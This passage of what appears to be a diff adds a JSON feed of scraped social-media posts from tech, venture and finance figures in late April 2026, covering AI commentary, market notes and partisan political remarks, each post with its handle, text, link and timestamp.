Valley: \"Imagine if he heard how the world really worked. Wonder what manifesto would say then.\"", + "url": "https://x.com/pmarca/status/2048621340408844368", + "published_at": "2026-04-27T04:32:43+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Image", + "url": "https://x.com/pmarca/status/2048620511912194339", + "published_at": "2026-04-27T04:29:26+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "The apps can rewrite the files. 👀", + "url": "https://x.com/pmarca/status/2048615807190769738", + "published_at": "2026-04-27T04:10:44+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France.\n\nMy French friend of @Fundoraclub wanted to see YC from the inside...and share it with the people of France. This is the result: a 90 minute insiders documentary. \n\nI don't work for Y Combinator itself, but I'll give you the experience I've had as a founder, alumni, investor etc. He showed up in March with cameras, videographers, newscasters, youtubers. He brought half the French tech press. \n\nWe spent 4 full days visiting YC founder offices and hacker houses. Going to pre-demo day practice sessions. Late night bar hopping with YC founders. Interviews with YC partners. \n\nIt was real. It was unfiltered. And it was inspiring.\n\nI went to Paris last week with my daughter Callie to watch it in a packed movie theater. This crowd of 500+ French investors got inspired about investing into YC startups. After watching this movie, they understand what I wish everyone understood: YC founders are incredibly capable and resilient builders that want to solve problems and YC helps them become formidable founders. It's impossible to not be inspired by them.\n\nAlan and Bradley Lafond just released the movie on Youtube (link below). Enjoy it! J'espère que vous l'apprécierez!\n\nA big thank you to @dessaigne, @garrytan, Victoria Holst and everyone at YC for helping us. This wasn't an official YC event (our fund and Fundora are not a part of YC to be clear). But they were so welcoming and generous!\n\nIt's an honor to share with France (and now with y'all) the experience I've gotten from YC. Our fund Orange Collective exists to help spread the YC love. If you were thinking of joining us as an investor for Fund I, contact me now before the final close on June 1st. If you're in France, contact Fundora. \n\nAnd big thank you to @nico_laqua, @qhoang09, @gregpr07, @mamagnus00, @smthomas3, @abhiaiyer, @marieschneegans, Veiga Management, Fundora and all the YC founders that hosted us!", + "url": "https://x.com/paulg/status/2048615296613937201", + "published_at": "2026-04-27T04:08:42+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Many such cases.", + "url": "https://x.com/pmarca/status/2048614869352714619", + "published_at": "2026-04-27T04:07:00+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "🇺🇸", + "url": "https://x.com/pmarca/status/2048614659595583651", + "published_at": "2026-04-27T04:06:10+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Many such cases (in the universe).", + "url": "https://x.com/pmarca/status/2048614305705386433", + "published_at": "2026-04-27T04:04:46+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Concerning.", + "url": "https://x.com/pmarca/status/2048612144871264609", + "published_at": "2026-04-27T03:56:11+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Self recommending!", + "url": "https://x.com/pmarca/status/2048610397243265189", + "published_at": "2026-04-27T03:49:14+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: The greatest con of the decade was calling autocomplete “AI”. \n\nThe second greatest is calling autocomplete-in-a-loop an “agent”.", + "url": "https://x.com/GaryMarcus/status/2048608025464705084", + "published_at": "2026-04-27T03:39:49+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Grok Imagine", + "url": "https://x.com/elonmusk/status/2048600964102246438", + "published_at": "2026-04-27T03:11:45+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Self recommending recommending.", + "url": "https://x.com/pmarca/status/2048598334492033455", + "published_at": "2026-04-27T03:01:18+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "👀", + "url": "https://x.com/pmarca/status/2048597298150875169", + "published_at": "2026-04-27T02:57:11+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "“Always keep a separate backup.” For sure, every experienced programmer should know this.\n\n𝘉𝘶𝘵 𝘸𝘦 𝘫𝘶𝘴𝘵 𝘤𝘳𝘦𝘢𝘵𝘦𝘥 𝘢 𝘸𝘩𝘰𝘭𝘦 𝘨𝘦𝘯𝘦𝘳𝘢𝘵𝘪𝘰𝘯 𝘰𝘧 𝘷𝘪𝘣𝘦 𝘤𝘰𝘥𝘦𝘳𝘴 𝘸𝘩𝘰 𝘥𝘰𝘯’𝘵.\n\nAnd we now have a legion of synthetic coding agents (like Cursor) that also apparently don’t always follow this basic principle, either.\n\n𝗪𝗵𝗶𝗰𝗵 𝗶𝘀 *𝗲𝘅𝗮𝗰𝘁𝗹𝘆* 𝘄𝗵𝘆 𝘄𝗲 𝘀𝗵𝗼𝘂𝗹𝗱 𝗻𝗼𝘁 𝘁𝗿𝘂𝘀𝘁 𝗰𝗼𝗱𝗶𝗻𝗴 𝗮𝗴𝗲𝗻𝘁𝘀.", + "url": "https://x.com/GaryMarcus/status/2048593283639894520", + "published_at": "2026-04-27T02:41:14+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "👀", + "url": "https://x.com/pmarca/status/2048591674688037210", + "published_at": "2026-04-27T02:34:50+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Curiosity & adventure are my philosophy\n\nhttps://grok.com/share/bGVnYWN5_d70e0164-cced-4096-99cb-38604067aa7a", + "url": "https://x.com/elonmusk/status/2048589691054694406", + "published_at": "2026-04-27T02:26:57+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: “fails less often than a human does” is a terrible metric. \n \nWe build deterministic software and test it to destruction to ensure it’s 99.99999 reliable . That’s been the basis of every critical application such as accounting payroll and logistics. \n\nLLMs can’t get even close.", + "url": "https://x.com/GaryMarcus/status/2048589239915577837", + "published_at": "2026-04-27T02:25:10+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Overheard in Silicon Valley: \"Did a Claw post this?\"", + "url": "https://x.com/pmarca/status/2048589233095643240", + "published_at": "2026-04-27T02:25:08+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: the beauty of a jagged frontier\nis that every failure is the user's fault\nand every breakthrough is the model's glory", + "url": "https://x.com/GaryMarcus/status/2048582672163995766", + "published_at": "2026-04-27T01:59:04+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Incredible writing from @euphoriaHBO", + "url": "https://x.com/jason/status/2048580651985604783", + "published_at": "2026-04-27T01:51:02+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: I mean AI influencers here and everywhere are screaming you shouldn't get hired if you don't use agentic AI because you're deliberatly slowing everyone down and the moment something goes wrong it's your fault because you didn't understand the tool?", + "url": "https://x.com/GaryMarcus/status/2048580122521780676", + "published_at": "2026-04-27T01:48:56+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: The only AGI that Sam Altman is after is Adjusted Gross Income.", + "url": "https://x.com/GaryMarcus/status/2048579079121555764", + "published_at": "2026-04-27T01:44:47+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "the difference is that we don’t *hype* giving 12 year-olds bulldozers.\n\n*of course* it’s a kind of user error when a model destroys all of user’s data and they didn’t have a backup. that’s the point.\n\nvibe coding without considerable experience is like driving without a license.", + "url": "https://x.com/GaryMarcus/status/2048578055283880296", + "published_at": "2026-04-27T01:40:43+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Overheard in Silicon Valley: \"Now, software is just the prompt for the next version of the software.\"", + "url": "https://x.com/pmarca/status/2048573035616375134", + "published_at": "2026-04-27T01:20:46+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: Never ever use generative AI for anything critical. \n\nThe technology is probablistic all the way down and therefore inherently unreliable. \n\nWhy is this so hard to understand? \n\nIt’s wild how many seemingly smart people have drunk the cool aid on this.", + "url": "https://x.com/GaryMarcus/status/2048570082843082905", + "published_at": "2026-04-27T01:09:02+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Generative AI as the Hindenberg", + "url": "https://x.com/GaryMarcus/status/2048567837221089669", + "published_at": "2026-04-27T01:00:07+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Is it me or X starting to look like a vibe coded mess?\n\nPolls are broken.\n\nAccounts are getting hacked.\n\nMy DMs are full of phishing scams.\n\nBasics that used to work no longer work.", + "url": "https://x.com/GaryMarcus/status/2048558998325166498", + "published_at": "2026-04-27T00:25:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "so fun to see the reception to 5.5!\n\nthere is almost nothing that feels more gratifying to me than builders saying they find our tools useful.", + "url": "https://x.com/sama/status/2048554097985593849", + "published_at": "2026-04-27T00:05:31+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "R to @GaryMarcus: btw polling software is broken! votes aren’t showing, as many folks have noted. eg I see none:", + "url": "https://x.com/GaryMarcus/status/2048553390540734479", + "published_at": "2026-04-27T00:02:43+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Total AI disaster, totally predictable", + "url": "https://x.com/GaryMarcus/status/2048552931923013916", + "published_at": "2026-04-27T00:00:53+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "Our Principles:\n\nDemocratization, Empowerment, Universal Prosperity, Resilience, and Adaptability\n\nhttps://openai.com/index/our-principles/", + "url": "https://x.com/sama/status/2048552677433643427", + "published_at": "2026-04-26T23:59:53+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Remember this", + "url": "https://x.com/elonmusk/status/2048543344746250466", + "published_at": "2026-04-26T23:22:48+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Grad school indoctrination camps", + "url": "https://x.com/elonmusk/status/2048535299102265720", + "published_at": "2026-04-26T22:50:49+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "We hired someone for the investing team. \n\nSomething I never planned to do. \n\nThey sent the team 3 new deals per day for 90 days straight. \n\nAll aligned to our stage, geography and deal type. \n\nThat’s how you hustle and get a job in VC. \n\nStay tuned. Reveal to come.", + "url": "https://x.com/HarryStebbings/status/2048531257399664920", + "published_at": "2026-04-26T22:34:46+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Many such cases.", + "url": "https://x.com/pmarca/status/2048515643268567431", + "published_at": "2026-04-26T21:32:43+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: 🚨BREAKING: I found Cole Allen's archived tweets.\n\nHe predicted \"Kamala wins all swing states,\" compared Trump's win to “Nazis getting elected,” and moved to Bluesky.\n\nThe scary part: he retweeted every mainstream Democrat on this platform.\n\nThread below. 👇\n\nWhat radicalized him were the same talking points repeated every day on the left.", + "url": "https://x.com/elonmusk/status/2048512831692452091", + "published_at": "2026-04-26T21:21:33+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.", + "url": "https://x.com/DavidSacks/status/2048502978626113625", + "published_at": "2026-04-26T20:42:24+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "I’ve invested in 700 private companies \n\nProviding liquidity and loans to high performing founders is completely standard. \n\nIn fact, investors encourage loans and secondary sales for founders to enable them to go for the Gold — which is exactly what SpaceX has done. \n\nThe @NYTimesPR is presenting this as a controversy, when in fact it’s the private company playbook in 2026. \n\nAnother hit job from the NYT", + "url": "https://x.com/jason/status/2048487905543237675", + "published_at": "2026-04-26T19:42:30+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 of the best CEOs of the last 10 years. \n\nAdam Foroughi, Founder @AppLovin is easily top 3, ever. \n\n$160BN Market Cap \n\n$5.48BN Revenue\n\n$10M EBITDA per head \n\n82%+ margins\n\nJust 450 people in core business 🤯 \n\nNo other business on the planet has numbers like this. \n\nEpisode tomorrow 👇", + "url": "https://x.com/HarryStebbings/status/2048486182904852537", + "published_at": "2026-04-26T19:35:39+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs, lower unemployment, higher GDP in Democratic administrations than every GOP administration in the last 3 decades. Without fail.", + "url": "https://x.com/ylecun/status/2048469956627468510", + "published_at": "2026-04-26T18:31:11+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Ok @Acosta, balls in your court", + "url": "https://x.com/jason/status/2048465651723882972", + "published_at": "2026-04-26T18:14:04+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "The NYTimes focus last week was micro-looting, social murder and meaningless private company transactions designed to ferment class warfare.\n\nDisgraziad", + "url": "https://x.com/jason/status/2048463405590225173", + "published_at": "2026-04-26T18:05:09+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Accurate", + "url": "https://x.com/DavidSacks/status/2048456433981591867", + "published_at": "2026-04-26T17:37:26+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950.\n\nThe National Science Board is the independent body that oversees the National Science Foundation, the agency that distributes $9 billion in research grants every year. \n\nIts members are scientists and engineers from universities and industry. They serve six-year staggered terms specifically so they cross presidential administrations and stay independent of whoever is in power.\n\nOn Friday, every single one of them got the same boilerplate email from Mary Sprowls of the Presidential Personnel Office: \"On behalf of President Donald J Trump, I am writing to inform you that your position as a member of the National Science Board is terminated, effective immediately. Thank you for your service.\"\n\nThat's it. That's the whole letter. For 76 years of institutional independence.\n\nThe NSF funds the basic science behind MRIs. Cellphones. LASIK eye surgery. GPS. The internet itself. The Antarctic research stations. The deep-space telescopes. The research vessels mapping the ocean floor. Every breakthrough that made America the world's leader in science for the better part of a century traces back through grants this agency made and this board approved.\n\nThe board chair, Victor McCrary, was actively advising Congress on Trump's proposed 55% cut to NSF's budget. The board was helping fight back. So Trump fired the board.\n\nMarvi Matos Rodriguez, one of the fired members, told reporters she had been reviewing an 80-page report as part of her board duties just days before being terminated. \n\nKeivan Stassun, a physicist at Vanderbilt, said NSF's leadership had already stopped responding to board oversight requests months ago. \"We would ask them, 'Are you following board governance directives?' And their answer would be, in effect, 'We don't listen to you anymore.'\"\n\nNow there's no board to answer to.\n\nRep. Zoe Lofgren of California, the top Democrat on the House Science Committee, called it \"the latest stupid move made by a president who continues to harm science and American innovation. Will the president fill the NSB with MAGA loyalists who won't stand up to him as he hands over our leadership in science to our adversaries?\"\n\nThat's the actual question. \n\nBecause while Trump is firing American scientists, China is building research universities at a rate we cannot match. The CDC just buried a study showing vaccines work.\n\n RFK Jr. runs HHS. The EPA is gutted. The Forest Service is being broken. Half of American children are breathing dangerous air. And now the people who decide what gets researched in the United States have all been fired by email on a Friday afternoon.", + "url": "https://x.com/ylecun/status/2048453901930660058", + "published_at": "2026-04-26T17:27:23+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Who made this?!", + "url": "https://x.com/jason/status/2048450286902235560", + "published_at": "2026-04-26T17:13:01+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "I’m proud to announce I’m hosting an exhibition cage match between @Acosta and @mtracey on July 4th \n\n$100,000 cash prize \n\nVegas \n\n3, 3 minute rounds", + "url": "https://x.com/jason/status/2048437340218044499", + "published_at": "2026-04-26T16:21:34+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Does a government shutdown negatively impact the stock market?\n\nNo.\n\nThe S&P 500 has gained an average of 0.4% during prior shutdowns and is up 4.8% during the current shutdown which is the longest in history at 70 days and counting.\n\n$SPX", + "url": "https://x.com/charliebilello/status/2048436641451155650", + "published_at": "2026-04-26T16:18:48+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Once again, the substack party result in a Donnybrook — it’s like the source awards for wordmaxxers", + "url": "https://x.com/jason/status/2048436081725464959", + "published_at": "2026-04-26T16:16:34+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: 25% of very liberal people say political violence can “sometimes be justified.”\n\nAmong very conservative people it’s just 3%.\n\nIn other words, the far left is 8x more likely to support political violence as the far right.\n\nStop pretending this is a “both sides” problem. It’s not.", + "url": "https://x.com/elonmusk/status/2048435593244237849", + "published_at": "2026-04-26T16:14:38+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. \n\nPoliticians never waste a good fake crisis, which is why they're perfect for Bernie to try to seize the means of production back from the private sphere.\n\nImagine if a mainstream politician put the Heaven's Gate suicide cult on the platform in 1997?\n\nThat's where we are in American politics at the edges today. \n\nWe've jumped the shark into the absurd and we've completely lost the thread of reality in America today.\n\nAnd it isn't AI that caused this madness. It is good old fashioned human hallucination, story telling and delusion.\n\nSociety should never make policy about imaginary future threats that have no actual basis in reality. AI is already used by billions and it is nothing like what people imagined it to be and we're all still here and the problems have been ridiculously minimal even by the standards of past tech revolutions.\n\nIf I told you there was a technology where 1.5 million people would die every year and injure 50 million would you sign up for that tech? The answer is yes because it's cars. You probably got in one today and accepted that risk and never even thought about it.\n\nIn contrast, the amount of people who died or were injured by AI is a tiny fraction of a percent and even those cases are probably specious at best.\n\nIn fact, AI has actually saved countless lives. It's saved lives through drug discovery by helping create the COVID and flu vaccines. It's saved lives through anti-lock breaks. It's saved lives with self driving cars that are 10X safer than human drivers and yet the only thing you read about self driving cars in the news are the incredibly rare stories of the very few times it did actually kill a dog or injure someone.\n\nIf that sounds irrational and insane that's because it is.\n\nWe're worried about a technology with a nearly perfect track record of safety and are totally fine with a technology that kills people every day?\n\nWelcome to the irrationality of the human mind!\n\nIf the pause AI cult had their way we'd still be stuck on GPT2 which was a hallucinating mess and we'd have made no progress to the much more sound and highly aligned and intelligent and useful models we have now.\n\nThat's because you can't make progress by imagining it in your mind or writing idiotic essays on Less Wrong to other mental masturbators. \n\nYou solve problems in the real world through trial and error. \n\nThe way to make AI safe is by building it and iterating in the real world. \n\nThere is no other way.", + "url": "https://x.com/ylecun/status/2048432684930654430", + "published_at": "2026-04-26T16:03:04+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "feels like a good time to seriously rethink how operating systems and user interfaces are designed\n\n(also the internet; there should be a protocol that is equally usable by people and agents)", + "url": "https://x.com/sama/status/2048428561481265539", + "published_at": "2026-04-26T15:46:41+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "\"post-AGI, no one is going to work and the economy is going to collapse\"\n\n\"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stretches and miss out on working\"", + "url": "https://x.com/sama/status/2048426122854228141", + "published_at": "2026-04-26T15:37:00+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: The 12.5% gain in the S&P 500 over the last 4 weeks was the 20th biggest 4-week advance for the index since 1950. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s", + "url": "https://x.com/charliebilello/status/2048419415222259820", + "published_at": "2026-04-26T15:10:21+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Seeing two types of founders emerge in this moment:\n\nThe tourists and the terminators. \n\nThe terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want it more than ever. \n\nThe tourists. They want to sell. They are scared. They do not want to commit 10 years to such uncertainty. \n\nPack is separating.", + "url": "https://x.com/HarryStebbings/status/2048418806867870115", + "published_at": "2026-04-26T15:07:55+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by the handle http://ColdForce.bsky.social with multiple references violence and guns.\n\nIn one post he calls President Trump the Antichrist.\n\nIn another he recommends buying guns in reaction to Trump’s DOJ exploring ways to ban firearm purchases from transgenders.\n\nIn one post he calls Trump a sociopathic mob boss and in another referred to him as a traitor with known connections to Putin, repeating a favorite leftwing Russian Hoax talking point.\n\nHe also attacks JD Vance for advocating an end to America’s funding the war in Ukraine and for his criticisms of the Pope. He seems pretty fixated on Ukraine more generally.\n\nHe also frequently interacts with Will Stancil’s Bluesky account, among others.", + "url": "https://x.com/DavidSacks/status/2048417712439689346", + "published_at": "2026-04-26T15:03:35+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one.\n\nGPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it.\n\nWhole new business opportunity here for the taking.", + "url": "https://x.com/paulg/status/2048413815675539816", + "published_at": "2026-04-26T14:48:06+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought to at least try to keep the site clean.", + "url": "https://x.com/paulg/status/2048413578789634100", + "published_at": "2026-04-26T14:47:09+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Durer was the original Dr Seuss.", + "url": "https://x.com/paulg/status/2048411898081583547", + "published_at": "2026-04-26T14:40:28+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I'm still just as afraid of making mistakes.", + "url": "https://x.com/paulg/status/2048411021329453562", + "published_at": "2026-04-26T14:36:59+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: The stock market is at an all-time high.\n\nCredit spreads are near all-time lows.\n\nAnd inflation has been above the Fed's target level for 61 consecutive months, averaging 4% per year since 2019.\n\nSo why is the Fed expanding its balance sheet (QE)?\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=1433s", + "url": "https://x.com/charliebilello/status/2048406550897729561", + "published_at": "2026-04-26T14:19:13+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: On March 30, the S&P 500 was down 7% in 2026, the 12th worst start to a year in history. After one of the biggest 4-week rallies ever, it's now up +5% YTD and above the average year at this point in time (+3%). There is no impossible in markets.\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s", + "url": "https://x.com/charliebilello/status/2048401720540061794", + "published_at": "2026-04-26T14:00:02+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "The best founders I know all text their investors. \n\nNone of them email them. \n\nThe relationship will blossom and deepen in a matter of messages.", + "url": "https://x.com/HarryStebbings/status/2048400836024283246", + "published_at": "2026-04-26T13:56:31+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: Random pic of @Jason protecting our $TAO bags", + "url": "https://x.com/jason/status/2048399674269213067", + "published_at": "2026-04-26T13:51:54+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "Shooting oneself in the foot?\nNope.\nShooting oneself in the prefrontal cortex.", + "url": "https://x.com/ylecun/status/2048399621492236615", + "published_at": "2026-04-26T13:51:41+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Global Inflation Rates are on the RISE...\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=1433s", + "url": "https://x.com/charliebilello/status/2048397937156518387", + "published_at": "2026-04-26T13:45:00+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank\nhttps://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-call-to-sanction-israel-over-west-bank/0000019d-c950-d11b-a7df-ef5a5fba0000", + "url": "https://x.com/paulg/status/2048396013816152216", + "published_at": "2026-04-26T13:37:21+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: With the exception of Bitcoin, every major asset class is now in positive territory on the year...\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s", + "url": "https://x.com/charliebilello/status/2048394162366533935", + "published_at": "2026-04-26T13:30:00+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: The S&P 500 ended the week at another all-time high, its 9th of the year. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s", + "url": "https://x.com/charliebilello/status/2048390341221404827", + "published_at": "2026-04-26T13:14:49+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Good use of camouflage by Biscuit.", + "url": "https://x.com/paulg/status/2048370801833828507", + "published_at": "2026-04-26T11:57:10+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯\n\nSabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!!\n\nHe makes history as the first man to officially break 2 hours in the marathon.\n\nYomif Kejelcha 🇪🇹 in his debut ran 1:59:41 to become 2nd fastest alltime, while Jacob Kiplimo 🇺🇬 finished in 2:00:28.\n\nAll under the previous World Record.", + "url": "https://x.com/JeffDean/status/2048351736037826877", + "published_at": "2026-04-26T10:41:25+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories.\n\nIf you're on either side of this slider, congratulations, you may be a child in an adult costume body!\n\nBlack and white thinking is for children. \n\nWhen you become an adult it's time to put away childish things.", + "url": "https://x.com/ylecun/status/2048293118781296734", + "published_at": "2026-04-26T06:48:29+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "The left has a serious violence problem, which @DavidSacks called out early and often. \n\nThis generation of woke democratic socialists are morally bankrupt. \n\nThey believe in looting and violence as a political tool — and they’re vocal about it. \n\nIf you called out the violent members of the January 6th riots, you also have to call out the radical left. \n\n#ballsandstrikes 